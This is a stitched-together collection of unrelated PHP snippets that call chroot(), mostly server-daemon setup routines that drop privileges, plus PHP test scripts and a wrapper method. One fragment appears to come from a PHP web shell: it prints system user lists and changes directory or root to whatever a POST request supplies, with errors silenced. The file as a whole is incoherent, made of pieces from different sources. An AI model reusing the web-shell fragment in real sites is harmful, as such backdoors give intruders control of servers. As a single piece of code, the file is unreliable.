/** * 根据配置初始化服务器 */ function init_pcntl() { if (isset($this->cfg['pcntl']['daemon'])) { $this->daemon(); } $this->main_pid = posix_getpid(); if (isset($this->cfg['pcntl']['user'])) { $user = posix_getpwnam($this->cfg['pcntl']['user']); $this->setuid($user['uid'], $user['gid']); } if (isset($this->cfg['pcntl']['pid_file'])) { file_put_contents($this->cfg['pcntl']['pid_file'], $this->main_pid); } if (isset($this->cfg['pcntl']['chroot'])) { chroot($this->cfg['pcntl']['chroot']); } }
/** * Register Fs_Node as named path. * * Changing predefined paths: * root chroot() * home setenv(HOME) * cwd chdir() * basepath Project basepath (defaults to document_root) * * @param string $name * @param string|Fs_Node $file */ public static function setPath($name, $file) { if (!$file instanceof Fs_Node) { $file = self::get($file); } $name = strtolower($name); switch ($name) { case 'root': if (!chroot($file)) { throw new Exception("Failed to change root to '{$file}'."); } return; case 'home': if (!putenv("HOME={$file}")) { throw new Exception("Failed to change home dir to '{$file}'."); } break; case 'cwd': if (!chdir($file)) { throw new Exception("Failed to change dir to '{$file}'."); } return; case 'document_root': case 'script': throw new Exception("Unable to set {$name} to '{$file}'; Property is read only."); } self::$paths[$name] = $file; }
public function run() { proc_nice(Daemon::$settings['workerpriority']); Daemon::$worker = $this; $this->microsleep = Daemon::$settings['microsleep']; $this->autoReloadLast = time(); $this->reloadDelay = Daemon::$parsedSettings['mpmdelay'] + 2; $this->setStatus(4); Thread::setproctitle(Daemon::$runName . ': worker process' . (Daemon::$settings['pidfile'] !== Daemon::$settings['defaultpidfile'] ? ' (' . Daemon::$settings['pidfile'] . ')' : '')); register_shutdown_function(array($this, 'shutdown')); if (Daemon::$settings['autogc'] > 0) { gc_enable(); } else { gc_disable(); } if (isset(Daemon::$settings['group'])) { $sg = posix_getgrnam(Daemon::$settings['group']); } if (isset(Daemon::$settings['user'])) { $su = posix_getpwnam(Daemon::$settings['user']); } if (Daemon::$settings['chroot'] !== '/') { if (posix_getuid() != 0) { Daemon::log('You must have the root privileges to change root.'); exit(0); } elseif (!chroot(Daemon::$settings['chroot'])) { Daemon::log('Couldn\'t change root to \'' . Daemon::$settings['chroot'] . '\'.'); exit(0); } } if (isset(Daemon::$settings['group'])) { if ($sg === FALSE) { Daemon::log('Couldn\'t change group to \'' . Daemon::$settings['group'] . '\'. You must replace config-variable \'group\' with existing group.'); exit(0); } elseif ($sg['gid'] != posix_getgid() && !posix_setgid($sg['gid'])) { Daemon::log('Couldn\'t change group to \'' . Daemon::$settings['group'] . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno)); exit(0); } } if (isset(Daemon::$settings['user'])) { if ($su === FALSE) { Daemon::log('Couldn\'t change user to \'' . Daemon::$settings['user'] . '\', user not found. You must replace config-variable \'user\' with existing username.'); exit(0); } elseif ($su['uid'] != posix_getuid() && !posix_setuid($su['uid'])) { Daemon::log('Couldn\'t change user to \'' . Daemon::$settings['user'] . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno)); exit(0); } } if (Daemon::$settings['cwd'] !== '.') { if (!@chdir(Daemon::$settings['cwd'])) { Daemon::log('WORKER ' . $this->pid . '] Couldn\'t change directory to \'' . Daemon::$settings['cwd'] . '.'); } } $this->setStatus(6); $this->eventBase = event_base_new(); Daemon::$appResolver->preload(); foreach (Daemon::$appInstances as $app) { foreach ($app as $appInstance) { if (!$appInstance->ready) { $this->ready = TRUE; $appInstance->onReady(); } } } $this->setStatus(1); $ev = event_new(); event_set($ev, STDIN, EV_TIMEOUT, function () { }, array()); event_base_set($ev, $this->eventBase); $this->timeoutEvent = $ev; while (TRUE) { pcntl_signal_dispatch(); if (($s = $this->checkState()) !== TRUE) { $this->closeSockets(); if (sizeof($this->queue) === 0) { return $s; } } event_add($this->timeoutEvent, $this->microsleep); event_base_loop($this->eventBase, EVLOOP_ONCE); do { for ($i = 0, $s = sizeof($this->eventsToAdd); $i < $s; ++$i) { event_add($this->eventsToAdd[$i]); unset($this->eventsToAdd[$i]); } $this->readPool(); $processed = $this->runQueue(); } while ($processed || $this->readPoolState || $this->eventsToAdd); } }
/** * Setup settings on start. * @return void */ protected function prepareSystemEnv() { proc_nice(Daemon::$config->workerpriority->value); register_shutdown_function(function () { $this->shutdown(true); }); $this->setTitle(Daemon::$runName . ': worker process' . (Daemon::$config->pidfile->value !== Daemon::$config->defaultpidfile->value ? ' (' . Daemon::$config->pidfile->value . ')' : '')); if (isset(Daemon::$config->group->value)) { $sg = posix_getgrnam(Daemon::$config->group->value); } if (isset(Daemon::$config->user->value)) { $su = posix_getpwnam(Daemon::$config->user->value); } $flushCache = false; if (Daemon::$config->chroot->value !== '/') { if (posix_getuid() != 0) { Daemon::log('You must have the root privileges to change root.'); exit(0); } elseif (!chroot(Daemon::$config->chroot->value)) { Daemon::log('Couldn\'t change root to \'' . Daemon::$config->chroot->value . '\'.'); exit(0); } $flushCache = true; } if (isset(Daemon::$config->group->value)) { if ($sg === FALSE) { Daemon::log('Couldn\'t change group to \'' . Daemon::$config->group->value . '\'. You must replace config-variable \'group\' with existing group.'); exit(0); } elseif ($sg['gid'] != posix_getgid() && !posix_setgid($sg['gid'])) { Daemon::log('Couldn\'t change group to \'' . Daemon::$config->group->value . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno)); exit(0); } $flushCache = true; } if (isset(Daemon::$config->user->value)) { if ($su === FALSE) { Daemon::log('Couldn\'t change user to \'' . Daemon::$config->user->value . '\', user not found. You must replace config-variable \'user\' with existing username.'); exit(0); } elseif ($su['uid'] != posix_getuid() && !posix_setuid($su['uid'])) { Daemon::log('Couldn\'t change user to \'' . Daemon::$config->user->value . "'. Error (" . ($errno = posix_get_last_error()) . '): ' . posix_strerror($errno)); exit(0); } $flushCache = true; } if ($flushCache) { clearstatcache(true); } if (Daemon::$config->cwd->value !== '.') { if (!@chdir(Daemon::$config->cwd->value)) { Daemon::log('Couldn\'t change directory to \'' . Daemon::$config->cwd->value . '.'); } clearstatcache(true); } }
/** * 尝试设置运行当前进程的用户、用户组、文件系统根目录 * * @param $user_name */ public function setProcessUserAndRoot() { // set chroot if ($this->chroot) { if (posix_getuid() != 0) { self::log('Waring: You must have the root privileges to change root.', true); } else { if (!chroot($this->chroot)) { return self::log("Notice: chroot({$this->chroot}) fail.", true); } } } // get uid $user_info = posix_getpwnam($this->user); if (!$user_info) { return self::log("Waring: User {$this->user} not exsits", true); } $uid = $user_info['uid']; // get gid if ($this->group) { $group_info = posix_getgrnam($this->group); if (!$group_info) { return self::log("Waring: Group {$this->group} not exsits", true); } $gid = $group_info['gid']; } else { $gid = $user_info['gid']; } // set uid and gid if ($uid != posix_getuid() || $gid != posix_getgid()) { if (posix_getuid() != 0) { self::log('Waring: You must have the root privileges to change uid and gid.', true); } elseif (!posix_setgid($gid) || !posix_initgroups($user_info['name'], $gid) || !posix_setuid($uid)) { self::log("Waring: change gid or uid fail.", true); } } }
} else { echo '<center>'; foreach ($users as $user) { echo $user . "<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>"; die; } if (!empty($_POST['dir'])) { if (@function_exists('chdir')) { @chdir($_POST['dir']); } else { if (@function_exists('chroot')) { @chroot($_POST['dir']); } } } if (empty($_POST['dir'])) { if (@function_exists('chdir')) { $dir = @getcwd(); } } else { $dir = $_POST['dir']; } $unix = 0; if (strlen($dir) > 1 && $dir[1] == ":") { $unix = 0; } else { $unix = 1;
<?php mkdir("chroot_001_x"); var_dump(is_dir("chroot_001_x")); var_dump(chroot("chroot_001_x")); var_dump(is_dir("chroot_001_x")); var_dump(realpath("."));
function server_security_preparation(){ global $SERVER_CONFIG; $pid = pcntl_fork(); if ($pid == -1){ // error server_log_halt("Can not fork()..."); exit; }else if ($pid){ // parent exit; }else{ // child becomes our daemon } // Became session leader posix_setsid(); fclose(STDIN); fclose(STDOUT); fclose(STDERR); // moved at the end after chroot //chdir('/'); umask(0); // chroot if ($chroot = $SERVER_CONFIG["chroot"]){ if ( function_exists("chroot") ){ chroot($chroot); // chdir('/'); server_log("chroot() to $chroot", 1); }else{ server_log("Can not chroot(). Will try live without it."); } } if ( $SERVER_CONFIG["chdir"] ) chdir( $SERVER_CONFIG["chdir"] ); //install signal() handler pcntl_signal(SIGHUP, "server_signal_handler"); // ignore USR1 pcntl_signal(SIGUSR1, SIG_IGN); // Similar to apache, we will keep the master as root, and will setuid children. //server_setuid(); }
var_dump(is_writable($path1)); var_dump(is_writeable($path1)); var_dump(is_readable($path1)); var_dump(is_executable($path1)); var_dump(is_file($path1)); var_dump(is_dir($path1)); var_dump(is_link($path1)); var_dump(file_exists($path1)); var_dump(stat($path1)); var_dump(lstat($path1)); var_dump(realpath($path1)); var_dump(disk_free_space($path1)); var_dump(diskfreespace($path1)); var_dump(disk_total_space($path1)); var_dump(chmod($path1, '644')); var_dump(chown($path1, 'nobody')); var_dump(lchown($path1, 'nobody')); var_dump(chgrp($path1, 'nogrp')); var_dump(lchgrp($path1, 'nogrp')); var_dump(touch($path1)); var_dump(copy($path1, $path2)); var_dump(rename($path1, $path2)); var_dump(unlink($path1, $path2)); var_dump(link($path1, $path2)); var_dump(symlink($path1, $path2)); var_dump(fnmatch($path1, $path2)); var_dump(tempnam($path1, 'tmp')); var_dump(mkdir($path1)); var_dump(chdir($path1)); var_dump(chroot($path1)); var_dump(scandir($path1));
/** * Change the root directory * * @param string $directory The path to change the root directory to. * * @return bool */ public function chroot(string $directory) : bool { return chroot($directory); }